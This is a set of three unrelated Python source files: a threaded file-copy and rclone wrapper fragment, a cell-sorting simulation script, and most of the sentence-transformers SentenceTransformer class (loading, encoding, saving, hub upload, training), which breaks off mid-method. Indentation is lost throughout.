url = self.tserv_lb()
srcname = urljoin(url, fileName)
dstname = os.path.join(self.dst, fileName)
self.FetchFile(srcname, dstname)
if self.errors:
raise Error(self.errors)
with self.lock:
self.copyCount += 1
self.pbar.set_postfix(file=fileName[-10:], refresh=False)
self.pbar.update(size)
fileQueue.task_done()
def threadWorkerCopy(self, fileItemList):
for i in range(self.threads):
t = Thread(target=self.CopyWorker)
t.daemon = True
t.start()
for fileItem in fileItemList:
fileQueue.put(fileItem)
fileQueue.join()
self.pbar.close()
logger.info('Done')
class Rclone:
"""Rclone class. Uses subprocess to run rclone."""
def __init__(self, src, dst, flags=[], command='sync', cmdargs=[]):
self.src = src
self.dst = dst
self.flags = flags
self.command = command
self.cmdargs = cmdargs
self.errors = []
self.run_rclone()
def run_rclone(self):
from subprocess import check_output, CalledProcessError, STDOUT
cmd = ['rclone']
        cmd.extend(self.flags)
        cmd.append(self.command)
        cmd.append(self.src)
        cmd.append(self.dst)
        cmd.extend(self.cmdargs)
logger.debug('rclone command: {}'.format(" ".join(cmd)))
logger.info('Starting rclone from %s to %s..' % (self.src, self.dst))
try:
output = check_output(cmd, stderr=STDOUT)
logger.debug(output)
except CalledProcessError as e:
self.errors.append((self.src, self.dst, str(e.output), str(e.returncode)))
if self.errors:
raise Error(self.errors)
logger.info('Done')
|
k_pert_average_cell_sorting.py
|
import OS_model
from numpy import random
import multiprocessing
import numpy as np
from matplotlib import pyplot as plt
from matplotlib import rc
from numpy import genfromtxt
time_step = 0.005
end_time = 100
simulation_count = 10
times = np.linspace(0, end_time, int(end_time / time_step) + 1)
# Generate Data
def generate_data(k_pert):
file_name = str(k_pert).replace('.', '_') + 'pert_frac_length_spaced_data.txt'
f = open(file_name, 'a')
fractional_lengths = np.zeros((simulation_count, len(times)))
for i in range(simulation_count):
random.seed(i + 17)
x = OS_model.Monolayer(space=True)
x.set_k_pert(k_pert)
fractional_lengths[i] = x.measure_sorting(end_time)[1]
fractional_length_mean = np.mean(fractional_lengths, axis=0)
fractional_length_variance = np.var(fractional_lengths, axis=0)
np.savetxt(f, fractional_length_mean, fmt='%1.3f', newline=", ")
f.write("\n")
np.savetxt(f, fractional_length_variance, fmt='%1.5f', newline=", ")
f.write("\n")
f.close()
# Multiprocessing for time efficiency
if __name__ == '__main__':
jobs = []
k_pert = 45
p = multiprocessing.Process(target=generate_data, args=(k_pert,))
jobs.append(p)
p.start()
# rc('text', usetex=True)
# rc('font', family='serif')
#
# plot_every = 20 # Determines how frequently we pull data points to plot.
# plot_times = times[0::plot_every]
# #palette = ['royalblue', 'plum']
# fig, ax = plt.subplots()
# ax.grid(color='lightgray', linestyle='--', alpha=0.7)
# for index, k_pert in enumerate((0.1,1)):
# file_name = str(k_pert).replace('.', '_') + 'pert_frac_length_spaced_data.txt'
# fractional_length_data = genfromtxt(file_name, delimiter=',')
# plot_fractional_lengths = fractional_length_data[:, 0::plot_every]
# plt.plot(plot_times, plot_fractional_lengths[0], label=str(k_pert))
# std_dev = np.sqrt(plot_fractional_lengths[1])
# plt.fill_between(plot_times, plot_fractional_lengths[0] + std_dev, plot_fractional_lengths[0] - std_dev,
# alpha=0.2)
# plt.xlabel('Time')
# plt.ylabel('Fractional length')
# plt.legend(bbox_to_anchor=(1, 1, 1, 0), loc='upper left', title=r'$k_\textrm{pert}$')
# plt.show()
# # fig.savefig('file.pdf', bbox_inches='tight', )
|
SentenceTransformer.py
|
import json
import logging
import os
import shutil
import stat
from collections import OrderedDict, Counter
from typing import List, Dict, Tuple, Iterable, Type, Union, Callable, Optional
import requests
import numpy as np
from numpy import ndarray
import transformers
from huggingface_hub import HfApi, HfFolder, Repository, hf_hub_url, cached_download
import torch
from torch import nn, Tensor, device
from torch.optim import Optimizer
from torch.utils.data import DataLoader
import torch.multiprocessing as mp
from tqdm.autonotebook import trange
import math
import queue
import tempfile
from distutils.dir_util import copy_tree
from . import __MODEL_HUB_ORGANIZATION__
from .evaluation import SentenceEvaluator
from .util import import_from_string, batch_to_device, fullname, snapshot_download
from .models import Transformer, Pooling, Dense
from .model_card_templates import ModelCardTemplate
from . import __version__
logger = logging.getLogger(__name__)
class SentenceTransformer(nn.Sequential):
"""
    Loads or creates a SentenceTransformer model that can be used to map sentences / text to embeddings.
:param model_name_or_path: If it is a filepath on disc, it loads the model from that path. If it is not a path, it first tries to download a pre-trained SentenceTransformer model. If that fails, tries to construct a model from Huggingface models repository with that name.
:param modules: This parameter can be used to create custom SentenceTransformer models from scratch.
:param device: Device (like 'cuda' / 'cpu') that should be used for computation. If None, checks if a GPU can be used.
:param cache_folder: Path to store models
:param use_auth_token: HuggingFace authentication token to download private models.
"""
def __init__(self, model_name_or_path: Optional[str] = None,
modules: Optional[Iterable[nn.Module]] = None,
device: Optional[str] = None,
cache_folder: Optional[str] = None,
use_auth_token: Union[bool, str, None] = None
):
self._model_card_vars = {}
self._model_card_text = None
self._model_config = {}
if cache_folder is None:
cache_folder = os.getenv('SENTENCE_TRANSFORMERS_HOME')
if cache_folder is None:
try:
from torch.hub import _get_torch_home
torch_cache_home = _get_torch_home()
except ImportError:
torch_cache_home = os.path.expanduser(os.getenv('TORCH_HOME', os.path.join(os.getenv('XDG_CACHE_HOME', '~/.cache'), 'torch')))
cache_folder = os.path.join(torch_cache_home, 'sentence_transformers')
if model_name_or_path is not None and model_name_or_path != "":
logger.info("Load pretrained SentenceTransformer: {}".format(model_name_or_path))
#Old models that don't belong to any organization
basic_transformer_models = ['albert-base-v1', 'albert-base-v2', 'albert-large-v1', 'albert-large-v2', 'albert-xlarge-v1', 'albert-xlarge-v2', 'albert-xxlarge-v1', 'albert-xxlarge-v2', 'bert-base-cased-finetuned-mrpc', 'bert-base-cased', 'bert-base-chinese', 'bert-base-german-cased', 'bert-base-german-dbmdz-cased', 'bert-base-german-dbmdz-uncased', 'bert-base-multilingual-cased', 'bert-base-multilingual-uncased', 'bert-base-uncased', 'bert-large-cased-whole-word-masking-finetuned-squad', 'bert-large-cased-whole-word-masking', 'bert-large-cased', 'bert-large-uncased-whole-word-masking-finetuned-squad', 'bert-large-uncased-whole-word-masking', 'bert-large-uncased', 'camembert-base', 'ctrl', 'distilbert-base-cased-distilled-squad', 'distilbert-base-cased', 'distilbert-base-german-cased', 'distilbert-base-multilingual-cased', 'distilbert-base-uncased-distilled-squad', 'distilbert-base-uncased-finetuned-sst-2-english', 'distilbert-base-uncased', 'distilgpt2', 'distilroberta-base', 'gpt2-large', 'gpt2-medium', 'gpt2-xl', 'gpt2', 'openai-gpt', 'roberta-base-openai-detector', 'roberta-base', 'roberta-large-mnli', 'roberta-large-openai-detector', 'roberta-large', 't5-11b', 't5-3b', 't5-base', 't5-large', 't5-small', 'transfo-xl-wt103', 'xlm-clm-ende-1024', 'xlm-clm-enfr-1024', 'xlm-mlm-100-1280', 'xlm-mlm-17-1280', 'xlm-mlm-en-2048', 'xlm-mlm-ende-1024', 'xlm-mlm-enfr-1024', 'xlm-mlm-enro-1024', 'xlm-mlm-tlm-xnli15-1024', 'xlm-mlm-xnli15-1024', 'xlm-roberta-base', 'xlm-roberta-large-finetuned-conll02-dutch', 'xlm-roberta-large-finetuned-conll02-spanish', 'xlm-roberta-large-finetuned-conll03-english', 'xlm-roberta-large-finetuned-conll03-german', 'xlm-roberta-large', 'xlnet-base-cased', 'xlnet-large-cased']
if os.path.exists(model_name_or_path):
#Load from path
model_path = model_name_or_path
else:
#Not a path, load from hub
if '\\' in model_name_or_path or model_name_or_path.count('/') > 1:
raise ValueError("Path {} not found".format(model_name_or_path))
if '/' not in model_name_or_path and model_name_or_path.lower() not in basic_transformer_models:
# A model from sentence-transformers
model_name_or_path = __MODEL_HUB_ORGANIZATION__ + "/" + model_name_or_path
model_path = os.path.join(cache_folder, model_name_or_path.replace("/", "_"))
# Download from hub with caching
snapshot_download(model_name_or_path,
cache_dir=cache_folder,
library_name='sentence-transformers',
library_version=__version__,
ignore_files=['flax_model.msgpack', 'rust_model.ot', 'tf_model.h5'],
use_auth_token=use_auth_token)
if os.path.exists(os.path.join(model_path, 'modules.json')): #Load as SentenceTransformer model
modules = self._load_sbert_model(model_path)
else: #Load with AutoModel
modules = self._load_auto_model(model_path)
if modules is not None and not isinstance(modules, OrderedDict):
modules = OrderedDict([(str(idx), module) for idx, module in enumerate(modules)])
super().__init__(modules)
if device is None:
device = "cuda" if torch.cuda.is_available() else "cpu"
logger.info("Use pytorch device: {}".format(device))
self._target_device = torch.device(device)
def encode(self, sentences: Union[str, List[str]],
batch_size: int = 32,
show_progress_bar: bool = None,
output_value: str = 'sentence_embedding',
convert_to_numpy: bool = True,
convert_to_tensor: bool = False,
device: str = None,
normalize_embeddings: bool = False) -> Union[List[Tensor], ndarray, Tensor]:
"""
Computes sentence embeddings
:param sentences: the sentences to embed
:param batch_size: the batch size used for the computation
        :param show_progress_bar: Output a progress bar when encoding sentences
:param output_value: Default sentence_embedding, to get sentence embeddings. Can be set to token_embeddings to get wordpiece token embeddings. Set to None, to get all output values
:param convert_to_numpy: If true, the output is a list of numpy vectors. Else, it is a list of pytorch tensors.
:param convert_to_tensor: If true, you get one large tensor as return. Overwrites any setting from convert_to_numpy
:param device: Which torch.device to use for the computation
:param normalize_embeddings: If set to true, returned vectors will have length 1. In that case, the faster dot-product (util.dot_score) instead of cosine similarity can be used.
:return:
By default, a list of tensors is returned. If convert_to_tensor, a stacked tensor is returned. If convert_to_numpy, a numpy matrix is returned.
"""
self.eval()
if show_progress_bar is None:
show_progress_bar = (logger.getEffectiveLevel()==logging.INFO or logger.getEffectiveLevel()==logging.DEBUG)
if convert_to_tensor:
convert_to_numpy = False
if output_value != 'sentence_embedding':
convert_to_tensor = False
convert_to_numpy = False
input_was_string = False
if isinstance(sentences, str) or not hasattr(sentences, '__len__'): #Cast an individual sentence to a list with length 1
sentences = [sentences]
input_was_string = True
if device is None:
device = self._target_device
self.to(device)
all_embeddings = []
length_sorted_idx = np.argsort([-self._text_length(sen) for sen in sentences])
sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
for start_index in trange(0, len(sentences), batch_size, desc="Batches", disable=not show_progress_bar):
sentences_batch = sentences_sorted[start_index:start_index+batch_size]
features = self.tokenize(sentences_batch)
features = batch_to_device(features, device)
with torch.no_grad():
out_features = self.forward(features)
if output_value == 'token_embeddings':
embeddings = []
for token_emb, attention in zip(out_features[output_value], out_features['attention_mask']):
last_mask_id = len(attention)-1
while last_mask_id > 0 and attention[last_mask_id].item() == 0:
last_mask_id -= 1
embeddings.append(token_emb[0:last_mask_id+1])
elif output_value is None: #Return all outputs
embeddings = []
for sent_idx in range(len(out_features['sentence_embedding'])):
row = {name: out_features[name][sent_idx] for name in out_features}
embeddings.append(row)
else: #Sentence embeddings
embeddings = out_features[output_value]
embeddings = embeddings.detach()
if normalize_embeddings:
embeddings = torch.nn.functional.normalize(embeddings, p=2, dim=1)
# fixes for #522 and #487 to avoid oom problems on gpu with large datasets
if convert_to_numpy:
embeddings = embeddings.cpu()
all_embeddings.extend(embeddings)
all_embeddings = [all_embeddings[idx] for idx in np.argsort(length_sorted_idx)]
if convert_to_tensor:
all_embeddings = torch.stack(all_embeddings)
elif convert_to_numpy:
all_embeddings = np.asarray([emb.numpy() for emb in all_embeddings])
if input_was_string:
all_embeddings = all_embeddings[0]
return all_embeddings
def start_multi_process_pool(self, target_devices: List[str] = None):
"""
        Starts a multi-process pool to process the encoding with several independent processes.
This method is recommended if you want to encode on multiple GPUs. It is advised
to start only one process per GPU. This method works together with encode_multi_process
:param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
        :return: Returns a dict with the target processes, an input queue and an output queue.
"""
if target_devices is None:
if torch.cuda.is_available():
target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
else:
logger.info("CUDA is not available. Start 4 CPU worker")
target_devices = ['cpu']*4
logger.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
ctx = mp.get_context('spawn')
input_queue = ctx.Queue()
output_queue = ctx.Queue()
processes = []
for cuda_id in target_devices:
p = ctx.Process(target=SentenceTransformer._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue), daemon=True)
p.start()
processes.append(p)
return {'input': input_queue, 'output': output_queue, 'processes': processes}
@staticmethod
def stop_multi_process_pool(pool):
"""
Stops all processes started with start_multi_process_pool
"""
for p in pool['processes']:
p.terminate()
for p in pool['processes']:
p.join()
p.close()
pool['input'].close()
pool['output'].close()
def encode_multi_process(self, sentences: List[str], pool: Dict[str, object], batch_size: int = 32, chunk_size: int = None):
"""
        This method allows running encode() on multiple GPUs. The sentences are chunked into smaller packages
and sent to individual processes, which encode these on the different GPUs. This method is only suitable
for encoding large sets of sentences
:param sentences: List of sentences
:param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
:param batch_size: Encode sentences with batch size
        :param chunk_size: Sentences are chunked and sent to the individual processes. If None, a sensible size is determined.
:return: Numpy matrix with all embeddings
"""
if chunk_size is None:
chunk_size = min(math.ceil(len(sentences) / len(pool["processes"]) / 10), 5000)
logger.info("Chunk data into packages of size {}".format(chunk_size))
input_queue = pool['input']
last_chunk_id = 0
chunk = []
for sentence in sentences:
chunk.append(sentence)
if len(chunk) >= chunk_size:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
chunk = []
if len(chunk) > 0:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
output_queue = pool['output']
results_list = sorted([output_queue.get() for _ in range(last_chunk_id)], key=lambda x: x[0])
embeddings = np.concatenate([result[1] for result in results_list])
return embeddings
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue):
"""
Internal working process to encode sentences in multi-process setup
"""
while True:
try:
id, batch_size, sentences = input_queue.get()
embeddings = model.encode(sentences, device=target_device, show_progress_bar=False, convert_to_numpy=True, batch_size=batch_size)
results_queue.put([id, embeddings])
except queue.Empty:
break
def get_max_seq_length(self):
"""
        Returns the maximal sequence length of inputs the model accepts. Longer inputs will be truncated
"""
if hasattr(self._first_module(), 'max_seq_length'):
return self._first_module().max_seq_length
return None
def tokenize(self, texts: Union[List[str], List[Dict], List[Tuple[str, str]]]):
"""
Tokenizes the texts
"""
return self._first_module().tokenize(texts)
def get_sentence_features(self, *features):
return self._first_module().get_sentence_features(*features)
def get_sentence_embedding_dimension(self):
for mod in reversed(self._modules.values()):
sent_embedding_dim_method = getattr(mod, "get_sentence_embedding_dimension", None)
if callable(sent_embedding_dim_method):
return sent_embedding_dim_method()
return None
def _first_module(self):
"""Returns the first module of this sequential embedder"""
return self._modules[next(iter(self._modules))]
def _last_module(self):
"""Returns the last module of this sequential embedder"""
return self._modules[next(reversed(self._modules))]
def save(self, path: str, model_name: Optional[str] = None, create_model_card: bool = True):
"""
Saves all elements for this seq. sentence embedder into different sub-folders
:param path: Path on disc
:param model_name: Optional model name
:param create_model_card: If True, create a README.md with basic information about this model
"""
if path is None:
return
os.makedirs(path, exist_ok=True)
logger.info("Save model to {}".format(path))
modules_config = []
#Save some model info
if '__version__' not in self._model_config:
self._model_config['__version__'] = {
'sentence_transformers': __version__,
'transformers': transformers.__version__,
'pytorch': torch.__version__,
}
with open(os.path.join(path, 'config_sentence_transformers.json'), 'w') as fOut:
json.dump(self._model_config, fOut, indent=2)
#Save modules
for idx, name in enumerate(self._modules):
module = self._modules[name]
if idx == 0 and isinstance(module, Transformer): #Save transformer model in the main folder
model_path = path + "/"
else:
model_path = os.path.join(path, str(idx)+"_"+type(module).__name__)
os.makedirs(model_path, exist_ok=True)
module.save(model_path)
modules_config.append({'idx': idx, 'name': name, 'path': os.path.basename(model_path), 'type': type(module).__module__})
with open(os.path.join(path, 'modules.json'), 'w') as fOut:
json.dump(modules_config, fOut, indent=2)
# Create model card
if create_model_card:
self._create_model_card(path, model_name)
def _create_model_card(self, path: str, model_name: Optional[str] = None):
"""
        Creates an automatic model card and stores it in the given path
"""
if self._model_card_text is not None and len(self._model_card_text) > 0:
model_card = self._model_card_text
else:
tags = ModelCardTemplate.__TAGS__.copy()
model_card = ModelCardTemplate.__MODEL_CARD__
if len(self._modules) == 2 and isinstance(self._first_module(), Transformer) and isinstance(self._last_module(), Pooling) and self._last_module().get_pooling_mode_str() in ['cls', 'max', 'mean']:
pooling_module = self._last_module()
pooling_mode = pooling_module.get_pooling_mode_str()
model_card = model_card.replace("{USAGE_TRANSFORMERS_SECTION}", ModelCardTemplate.__USAGE_TRANSFORMERS__)
pooling_fct_name, pooling_fct = ModelCardTemplate.model_card_get_pooling_function(pooling_mode)
model_card = model_card.replace("{POOLING_FUNCTION}", pooling_fct).replace("{POOLING_FUNCTION_NAME}", pooling_fct_name).replace("{POOLING_MODE}", pooling_mode)
tags.append('transformers')
# Print full model
model_card = model_card.replace("{FULL_MODEL_STR}", str(self))
# Add tags
model_card = model_card.replace("{TAGS}", "\n".join(["- "+t for t in tags]))
# Add dim info
self._model_card_vars["{NUM_DIMENSIONS}"] = self.get_sentence_embedding_dimension()
# Replace vars we created while using the model
for name, value in self._model_card_vars.items():
model_card = model_card.replace(name, str(value))
# Replace remaining vars with default values
for name, value in ModelCardTemplate.__DEFAULT_VARS__.items():
model_card = model_card.replace(name, str(value))
if model_name is not None:
model_card = model_card.replace("{MODEL_NAME}", model_name.strip())
with open(os.path.join(path, "README.md"), "w", encoding='utf8') as fOut:
fOut.write(model_card.strip())
def save_to_hub(self,
repo_name: str,
organization: Optional[str] = None,
private: Optional[bool] = None,
commit_message: str = "Add new SentenceTransformer model.",
local_model_path: Optional[str] = None,
exist_ok: bool = False,
replace_model_card: bool = False):
"""
Uploads all elements of this Sentence Transformer to a new HuggingFace Hub repository.
:param repo_name: Repository name for your model in the Hub.
:param organization: Organization in which you want to push your model or tokenizer (you must be a member of this organization).
        :param private: Set to True for hosting a private model
:param commit_message: Message to commit while pushing.
:param local_model_path: Path of the model locally. If set, this file path will be uploaded. Otherwise, the current model will be uploaded
:param exist_ok: If true, saving to an existing repository is OK. If false, saving only to a new repository is possible
:param replace_model_card: If true, replace an existing model card in the hub with the automatically created model card
:return: The url of the commit of your model in the given repository.
"""
token = HfFolder.get_token()
if token is None:
raise ValueError("You must login to the Hugging Face hub on this computer by typing `transformers-cli login`.")
if '/' in repo_name:
splits = repo_name.split('/', maxsplit=1)
if organization is None or organization == splits[0]:
organization = splits[0]
repo_name = splits[1]
else:
raise ValueError("You passed and invalid repository name: {}.".format(repo_name))
endpoint = "https://huggingface.co"
repo_url = HfApi(endpoint=endpoint).create_repo(
token,
repo_name,
organization=organization,
private=private,
repo_type=None,
exist_ok=exist_ok,
)
full_model_name = repo_url[len(endpoint)+1:].strip("/")
with tempfile.TemporaryDirectory() as tmp_dir:
# First create the repo (and clone its content if it's nonempty).
logging.info("Create repository and clone it if it exists")
repo = Repository(tmp_dir, clone_from=repo_url)
# If user provides local files, copy them.
if local_model_path:
copy_tree(local_model_path, tmp_dir)
else: # Else, save model directly into local repo.
create_model_card = replace_model_card or not os.path.exists(os.path.join(tmp_dir, 'README.md'))
self.save(tmp_dir, model_name=full_model_name, create_model_card=create_model_card)
            #Find files larger than 5M and track them with git-lfs
large_files = []
for root, dirs, files in os.walk(tmp_dir):
for filename in files:
file_path = os.path.join(root, filename)
rel_path = os.path.relpath(file_path, tmp_dir)
if os.path.getsize(file_path) > (5 * 1024 * 1024):
large_files.append(rel_path)
if len(large_files) > 0:
logging.info("Track files with git lfs: {}".format(", ".join(large_files)))
repo.lfs_track(large_files)
logging.info("Push model to the hub. This might take a while")
push_return = repo.push_to_hub(commit_message=commit_message)
def on_rm_error(func, path, exc_info):
# path contains the path of the file that couldn't be removed
# let's just assume that it's read-only and unlink it.
try:
os.chmod(path, stat.S_IWRITE)
os.unlink(path)
except:
pass
# Remove .git folder. On Windows, the .git folder might be read-only and cannot be deleted
# Hence, try to set write permissions on error
try:
for f in os.listdir(tmp_dir):
shutil.rmtree(os.path.join(tmp_dir, f), onerror=on_rm_error)
except Exception as e:
logging.warning("Error when deleting temp folder: {}".format(str(e)))
pass
return push_return
def smart_batching_collate(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
Here, batch is a list of tuples: [(tokens, label), ...]
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
num_texts = len(batch[0].texts)
texts = [[] for _ in range(num_texts)]
labels = []
for example in batch:
for idx, text in enumerate(example.texts):
texts[idx].append(text)
labels.append(example.label)
labels = torch.tensor(labels).to(self._target_device)
sentence_features = []
for idx in range(num_texts):
tokenized = self.tokenize(texts[idx])
batch_to_device(tokenized, self._target_device)
sentence_features.append(tokenized)
return sentence_features, labels
def _text_length(self, text: Union[List[int], List[List[int]]]):
"""
Help function to get the length for the input text. Text can be either
a list of ints (which means a single text as input), or a tuple of list of ints
(representing several text inputs to the model).
"""
if isinstance(text, dict): #{key: value} case
return len(next(iter(text.values())))
elif not hasattr(text, '__len__'): #Object has no len() method
return 1
elif len(text) == 0 or isinstance(text[0], int): #Empty string or list of ints
return len(text)
else:
return sum([len(t) for t in text]) #Sum of length of individual strings
def fit(self,
train_objectives: Iterable[Tuple[DataLoader, nn.Module]],
evaluator: SentenceEvaluator = None,
epochs: int = 1,
steps_per_epoch = None,
scheduler: str = 'WarmupLinear',
warmup_steps: int = 10000,
optimizer_class: Type[Optimizer] = transformers.AdamW,
optimizer_params : Dict[str, object]= {'lr': 2e-5},
weight_decay: float = 0.01,
evaluation_steps: int = 0,
output_path: str = None,
save_best_model: bool = True,
max_grad_norm: float = 1,
use_amp: bool = False,
callback: Callable[[float, int, int], None] = None,
show_progress_bar: bool = True,
print_steps: int = 100,
checkpoint_path: str = None,
checkpoint_save_steps: int = 500,
checkpoint_save_total_limit: int = 0
):
"""
Train the model with the given training objective
Each training objective is sampled in turn for one batch.
We sample only as many batches from each objective as there are in the smallest one
to make sure of equal training with each dataset.
:param train_objectives: Tuples of (DataLoader, LossFunction). Pass more than one for multi-task learning
:param evaluator: An evaluator (sentence_transformers.evaluation) evaluates the model performance during training on held-out dev data. It is used to determine the best model that is saved to disc.
:param epochs: Number of epochs for training
:param steps_per_epoch: Number of training steps per epoch. If set to None (default), one epoch is equal the DataLoader size from train_objectives.
:param scheduler: Learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
        :param warmup_steps: Behavior depends on the scheduler. For WarmupLinear (default), the learning rate is increased from 0 up to the maximal learning rate. After these many training steps, the learning rate is decreased linearly back to zero.
:param optimizer_class: Optimizer
:param optimizer_params: Optimizer parameters
:param weight_decay: Weight decay for model parameters
:param evaluation_steps: If > 0, evaluate the model using evaluator after each number of training steps
:param output_path: Storage path for the model and evaluation files
:param save_best_model: If true, the best model (according to evaluator) is stored at output_path
:param max_grad_norm: Used for gradient normalization.
:param use_amp: Use Automatic Mixed Precision (AMP). Only for Pytorch >= 1.6.0
:param callback: Callback function that is invoked after each evaluation.
It must accept the following three parameters in this order:
`score`, `epoch`, `steps`
:param show_progress_bar: If True, output a tqdm progress bar
:param checkpoint_path: Folder to save checkpoints during training
:param checkpoint_save_steps: Will save a checkpoint after so many steps
:param checkpoint_save_total_limit: Total number of checkpoints to store
"""
##Add info to model card
#info_loss_functions = "\n".join(["- {} with {} training examples".format(str(loss), len(dataloader)) for dataloader, loss in train_objectives])
info_loss_functions = []
for dataloader, loss in train_objectives:
info_loss_functions.extend(ModelCardTemplate.get_train_objective_info(dataloader, loss))
info_loss_functions = "\n\n".join([text for text in info_loss_functions])
info_fit_parameters = json.dumps({"evaluator": fullname(evaluator), "epochs": epochs, "steps_per_epoch": steps_per_epoch, "scheduler": scheduler, "warmup_steps": warmup_steps, "optimizer_class": str(optimizer_class), "optimizer_params": optimizer_params, "weight_decay": weight_decay, "evaluation_steps": evaluation_steps, "max_grad_norm": max_grad_norm }, indent=4, sort_keys=True)
self._model_card_text = None
self._model_card_vars['{TRAINING_SECTION}'] = ModelCardTemplate.__TRAINING_SECTION__.replace("{LOSS_FUNCTIONS}", info_loss_functions).replace("{FIT_PARAMETERS}", info_fit_parameters)
if use_amp:
from torch.cuda.amp import autocast
scaler = torch.cuda.amp.GradScaler()
self.to(self._target_device)
dataloaders = [dataloader for dataloader, _ in train_objectives]
# Use smart batching
for dataloader in dataloaders:
dataloader.collate_fn = self.smart_batching_collate
loss_models = [loss for _, loss in train_objectives]
for loss_model in loss_models:
loss_model.to(self._target_device)
self.best_score = -9999999
if steps_per_epoch is None or steps_per_epoch == 0:
steps_per_epoch = min([len(dataloader) for dataloader in dataloaders])
num_train_steps = int(steps_per_epoch * epochs)
# Prepare optimizers
optimizers = []
schedulers = []
for loss_model in loss_models:
param_optimizer = list(loss_model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = optimizer_class(optimizer_grouped_parameters, **optimizer_params)
scheduler_obj = self._get_scheduler(optimizer, scheduler=scheduler, warmup_steps=warmup_steps, t_total=num_train_steps)
optimizers.append(optimizer)
schedulers.append(scheduler_obj)
global_step = 0
data_iterators = [iter(dataloader) for dataloader in dataloaders]
num_train_objectives = len(train_objectives)
skip_scheduler = False
for epoch in trange(epochs, desc="Epoch", disable=not show_progress_bar):
training_steps = 0
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
running_loss = 0
total = 0
label_count = Counter()
for i in trange(steps_per_epoch, desc="Iteration", smoothing=0.05, disable=not show_progress_bar):
for train_idx in range(num_train_objectives):
loss_model = loss_models[train_idx]
optimizer = optimizers[train_idx]
scheduler = schedulers[train_idx]
data_iterator = data_iterators[train_idx]
try:
data = next(data_iterator)
except StopIteration:
data_iterator = iter(dataloaders[train_idx])
data_iterators[train_idx] = data_iterator
data = next(data_iterator)
features, labels = data
if use_amp:
with autocast():
loss_value = loss_model(features, labels)
scale_before_step = scaler.get_scale()
scaler.scale(loss_value).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
scaler.step(optimizer)
scaler.update()
skip_scheduler = scaler.get_scale() != scale_before_step
else:
loss_value = loss_model(features, labels)
loss_value.backward()
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
optimizer.step()
running_loss += loss_value.item() * len(features)
label_count.update(labels.data.tolist())
total += len(features)
if i % print_steps == 0:
print(f"Running training loss: {running_loss/total};")
print(f"Label fraction of 1: {label_count[1]/(label_count[0] + label_count[1])};")
optimizer.zero_grad()
if not skip_scheduler:
scheduler.step()
training_steps += 1
global_step += 1
if evaluation_steps > 0 and training_steps % evaluation_steps == 0:
self._eval_during_training(evaluator, output_path, save_best_model, epoch, training_steps, callback)
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
if checkpoint_path is not None and checkpoint_save_steps is not None and checkpoint_save_steps > 0 and global_step % checkpoint_save_steps == 0:
self._save_checkpoint(checkpoint_path, checkpoint_save_total_limit, global_step)
self._eval_during_training(evaluator, output_path, save_best_model, epoch, -1, callback)
if evaluator is None and output_path is not None: #No evaluator, but output path: save final model version
self.save(output_path)
if checkpoint_path is not None:
self._save_checkpoint(checkpoint_path, checkpoint_save_total_limit, global_step)
def evaluate(self, evaluator: SentenceEvaluator, output_path: str = None):
"""
Evaluate the model
:param evaluator:
the evaluator
:param output_path:
the evaluator can write the results to this path
"""
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
return evaluator(self, output_path)
def _eval_during_training(self, evaluator, output_path, save_best_model, epoch, steps, callback):
"""Runs evaluation during the training"""
eval_path = output_path
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
eval_path = os.path.join(output_path, "eval")
os.makedirs(eval_path, exist_ok=True)
if evaluator is not None:
score = evaluator(self, output_path=eval_path, epoch=epoch, steps=steps)
if callback is not None:
callback(score, epoch, steps)
if score > self.best_score:
self.best_score = score
if save_best_model:
self.save(output_path)
def _save_checkpoint(self, checkpoint_path, checkpoint_save_total_limit, step):
# Store new checkpoint
self.save(os.path.join(checkpoint_path, str(step)))
# Delete old checkpoints
if checkpoint_save_total_limit is not None and checkpoint_save_total_limit > 0:
old_checkpoints = []
for subdir in os.listdir(checkpoint_path):
if subdir.isdigit():
old_checkpoints.append({'step': int(subdir), 'path': os.path.join(checkpoint_path, subdir)})
if len(old_checkpoints) > checkpoint_save_total_limit:
old_checkpoints = sorted(old_checkpoints, key=lambda x: x['step'])
shutil.rmtree(old_checkpoints[0]['path'])
def _load_auto_model(self, model_name_or_path):
"""
Creates a simple Transformer + Mean Pooling model and returns the modules
"""
logging.warning("No sentence-transformers model found with name {}. Creating a new one with MEAN pooling.".format(model_name_or_path))
transformer_model = Transformer(model_name_or_path)
pooling_model = Pooling(transformer_model.get_word_embedding_dimension(), 'mean')
return [transformer_model, pooling_model]
def _load_sbert_model(self, model_path):
"""
Loads a full sentence-transformers model
"""
# Check if the config_sentence_transformers.json file exists (exists since v2 of the framework)
config_sentence_transformers_json_path = os.path.join(model_path, 'config_sentence_transformers.json')
if os.path.exists(config_sentence_transformers_json_path):
with open(config_sentence_transformers_json_path) as fIn:
self._model_config = json.load(fIn)
if '__version__' in self._model_config and 'sentence_transformers' in self._model_config['__version__'] and self._model_config['__version__']['sentence_transformers'] > __version__:
logger.warning("You try to use a model that was created with version {}, however, your version is {}. This might cause unexpected behavior or errors. In that case, try to update to the latest version.\n\n\n".format(self._model_config['__version__']['sentence_transformers'], __version__))
# Check if a readme exists
model_card_path = os.path.join(model_path, 'README.md')
